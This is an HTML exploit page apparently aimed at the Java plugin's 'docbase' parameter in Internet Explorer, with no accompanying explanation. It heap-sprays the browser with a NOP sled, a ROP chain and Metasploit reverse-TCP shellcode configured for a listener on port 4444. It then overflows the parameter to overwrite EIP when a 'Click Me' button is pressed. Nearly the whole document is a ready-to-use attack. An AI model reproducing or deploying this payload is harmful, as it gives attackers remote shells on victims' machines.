<html>
<head>
   <link rel="shortcut icon" href="http://127.0.0.1:9999/x.ico" />
   <script src="heaplib.js"></script>

   <script>
   function packv(n) {
      var s = new Number(n).toString(16);
      while(s.length < 8) s = "0" + s;
      return(unescape("%u" + s.substring(4,8) + "%u" + s.substring(0,4)));
   }

   function spray_heap() {
      heap = new heapLib.ie(0x20000);

      var payload, block1, nopsled1;
    
//	 payload = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
	// windows/shell_reverse_tcp - 324 bytes
	// https://metasploit.com/
	// VERBOSE=false, LHOST=127.0.0.1, LPORT=4444,
	// ReverseAllowProxy=false, ReverseListenerThreaded=false,
	// StagerRetryCount=10, StagerRetryWait=5,
	// PrependMigrate=false, EXITFUNC=process, CreateSession=true,
	// AutoVerifySession=true
	payload = unescape("%6b%11%34%7c");  // pop eax
	payload += unescape("%40%a1%37%7c"); // fptr
	payload += unescape("%aa%13%34%7c"); // mov eax
	payload += unescape("%d9%18%34%7c"); // call eax 
	payload += unescape("%20%20%0a%0a"); // param 1
	payload += unescape("%00%40%00%00"); // param 2
	payload += unescape("%40%00%00%00"); // param 3
	payload += unescape("%0a%0a%0a%0a"); // param 4
	payload += unescape("%50%20%0a%0a"); //shellcode address
	payload += unescape("%90%90%90%90%90%90%90%90"); //nop
	payload += unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u685d%u3233%u0000%u7768%u3273%u545f%u4c68%u2677%uff07%ub8d5%u0190%u0000%uc429%u5054%u2968%u6b80%uff00%u50d5%u5050%u4050%u4050%u6850%u0fea%ue0df%ud5ff%u6a97%u6805%u007f%u0100%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%uc085%u0c74%u4eff%u7508%u68ec%ub5f0%u56a2%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff"); // shellcode

      block1 = unescape("%u9090%u9090");

      // build nopsled1
      nopsled1 = payload;
      while(nopsled1.length < 0x1000)
         nopsled1 += block1;

      var heapblock1 = nopsled1;

      while(heapblock1.length < 0x40000)
         heapblock1 += heapblock1;

      var trimmedblock1 = heapblock1.substring(2, 0x40000 - 0x21);

      // heap spray
      for(var i = 0 ; i < 800 ; i++)
         heap.alloc(trimmedblock1);
   }

   function trigger() {
      var buf = "";

      for(i = 0; i < 97; i++)
         buf += unescape("%41%41%41%41"); //change to anywhere you want (little-endian)
      
      buf += unescape("%20%20%0a%0a"); // ebp
      buf += unescape("%a4%11%34%7c"); // eip

      var htmlTags =
         "<object type='application/x-java-applet'>" +
         "<param name='launchjnlp' value='1'>" +
         "<param name='docbase' value='" + buf + "'>" +
         "</object>";

      document.write(htmlTags);
   }
   </script>
</head>
<body onload="spray_heap()">
   <input type="button" value="Click Me" onclick="trigger()">
</body>
</html>

